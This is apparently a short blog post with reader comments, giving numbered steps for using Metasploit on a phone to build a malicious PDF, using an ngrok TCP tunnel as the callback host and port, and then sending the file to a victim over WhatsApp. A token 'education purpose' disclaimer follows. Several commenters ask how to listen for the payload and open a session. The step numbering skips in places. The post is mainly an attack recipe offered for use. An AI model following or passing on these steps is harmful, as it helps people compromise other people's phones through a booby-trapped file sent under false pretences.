1.ngrok for WAN attacks
2.metasploit (pre-installed)
metasploit payload bind in PDF file
1.cd metasploit-framework
2. ./msfconsole (wait for few minutes)


4.cd metasploit-framework
5.cd modules
6.cd exploits
7.cd android
8.cd fileformat
9. now copy this file name you need this format for next step adobe_reader_pdf_js_interface.rb
10.back to the first terminal

12.now open an other terminal window ./ngrok tcp 1649

13.now copy the link "0.tcp.ngrok.io" that's are lhost for WAN but dh not copy my link you get an other link in ngrok
14. now back to the first window set lhost 0.tcp.ngrok.io
15. now copy port /0.tcp.ngrok 19238 you will get another port number...
16.set lport 15836

17.exploit
18 copy this /data/data/com.termux/files/home/.msf4/local/msf.pdf /sdcard your payload will be save in your internal mobile storage.. now send it to the victims mobile via whatsapp.. I'm not responsible for any misuse of this script.. only use for education purpose..
hi. good contribution
ردحذفPayload was created but how can I listen to that payload please help.
ردحذفIs it need root permission
ردحذفI cant move it into storage
How do I start a session for looking into phone
ردحذفThat msf.pdf not located in the root as mentioned above
ردحذفvery nice artical
ردحذفplease visit my blog
https://kidscricketcoaching.blogspot.com/2020/05/episode-16-back-foot-drive-29052020.html
إرسال تعليق
if you have doubts let me know...